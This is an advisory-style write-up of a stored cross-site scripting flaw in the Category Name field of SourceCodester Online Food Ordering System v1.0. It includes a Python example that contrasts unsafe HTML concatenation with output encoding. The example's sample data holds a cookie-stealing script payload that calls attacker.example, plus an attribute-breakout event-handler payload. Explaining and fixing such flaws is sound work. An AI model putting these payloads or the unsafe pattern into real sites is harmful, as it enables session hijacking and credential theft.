Impact
A stored cross‑site scripting vulnerability exists in the Category management module of the SourceCodester Online Food Ordering System v1.0. When an administrator or other privileged user creates or updates a category, the application stores the value supplied in the Category Name field without neutralizing HTML or script content. The injected JavaScript is persisted and executes automatically whenever the category is rendered, both in the admin panel and on the public Category list page. Any user who views an affected page therefore runs attacker‑controlled JavaScript in their browser, which can be used to hijack sessions, steal credentials, deface the site, or perform other actions in the victim’s context. Because the stored payload is also rendered to administrators, the impact extends to administrative sessions, not only to public visitors. The weakness is classified as CWE‑79 (Improper Neutralization of Input During Web Page Generation, i.e. cross‑site scripting).
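The following is an added illustration, not code from the Online Food Ordering System or from the advisory. It contrasts the vulnerable pattern the advisory describes (a stored category name concatenated into HTML as‑is) with a hardened renderer that encodes on output, plus an input allowlist as defence in depth. The category rows and the two payloads are constructed for the example; the attribute context (`data-name`) is assumed to show why quote escaping matters, and is not taken from the application.

```python
import html
import re

# Constructed sample rows standing in for the application's category table.
# The payloads are illustrative and are not taken from the advisory.
STORED_CATEGORIES = [
    {"id": 1, "name": "Pizza"},
    {"id": 2, "name": "<script>fetch('https://attacker.example/?c=' + document.cookie)</script>"},
    {"id": 3, "name": 'Drinks" onmouseover="alert(document.domain)'},
]


def render_category_list_unsafe(categories):
    """Vulnerable pattern: stored names are concatenated straight into HTML.
    The name lands in an attribute and in element text, so either a tag
    payload or an attribute-breakout payload executes in the viewer's browser."""
    rows = [
        f'<tr data-name="{c["name"]}"><td>{c["id"]}</td><td>{c["name"]}</td></tr>'
        for c in categories
    ]
    return "<table>\n" + "\n".join(rows) + "\n</table>"


def render_category_list_safe(categories):
    """Hardened pattern: contextual output encoding at render time.
    html.escape(quote=True) neutralises < > & " and ', which covers both
    the text node and the double-quoted attribute used in this template."""
    rows = []
    for c in categories:
        name = html.escape(c["name"], quote=True)
        rows.append(f'<tr data-name="{name}"><td>{c["id"]}</td><td>{name}</td></tr>')
    return "<table>\n" + "\n".join(rows) + "\n</table>"


# Defence in depth: an allowlist for what a category name may contain
# (assumed policy for this example). A food category has no legitimate need
# for angle brackets, double quotes, parentheses or equals signs.
_CATEGORY_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 &'\-]{0,49}$")


def is_valid_category_name(name):
    """Reject names containing markup characters before they are stored.
    Validation complements, but does not replace, output encoding."""
    return bool(_CATEGORY_NAME_RE.fullmatch(name))


if __name__ == "__main__":
    print("--- vulnerable rendering ---")
    print(render_category_list_unsafe(STORED_CATEGORIES))
    print("--- encoded rendering ---")
    print(render_category_list_safe(STORED_CATEGORIES))
    for c in STORED_CATEGORIES:
        verdict = "accepted" if is_valid_category_name(c["name"]) else "rejected"
        print(f"{c['name'][:32]!r}: {verdict}")
```

Running the script shows that the unsafe renderer emits a live `<script>` element for row 2 and, for row 3, lets the stored value close the `data-name` attribute and inject an `onmouseover` handler, while the encoded renderer turns both into inert text. The allowlist rejects both payloads at input time, but the output encoding is what actually closes the CWE‑79 hole, since any path that writes to the table without passing the validator would otherwise remain exploitable.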
Affected Systems
The issue is limited to SourceCodester Online Food Ordering System version 1.0. No other vendors, products, or versions are listed in the advisory. The flaw is specific to the Category Name input in the admin panel’s category management; the advisory does not report any other component of the application as affected.
Risk and Exploitability
Once a malicious string is stored, no further action by the attacker is needed: every subsequent view of the category list executes the script. Exploitation is straightforward for an attacker who can authenticate as a user with sufficient privileges to add or update categories; unauthenticated visitors cannot plant the payload, but they are among its victims wherever the public Category page renders it. A CVSS score and EPSS metric are not publicly available, and the advisory lists no vendor patch or mitigation, so affected deployments remain exposed. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities catalog, but the potential harm to the confidentiality and integrity of user and administrator sessions warrants prompt remediation: encode category names on output and validate them on input.